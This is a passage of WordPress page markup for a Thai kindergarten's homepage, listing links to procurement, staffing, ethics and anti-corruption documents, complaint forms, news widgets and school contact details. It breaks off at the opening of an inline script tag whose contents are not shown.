{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function 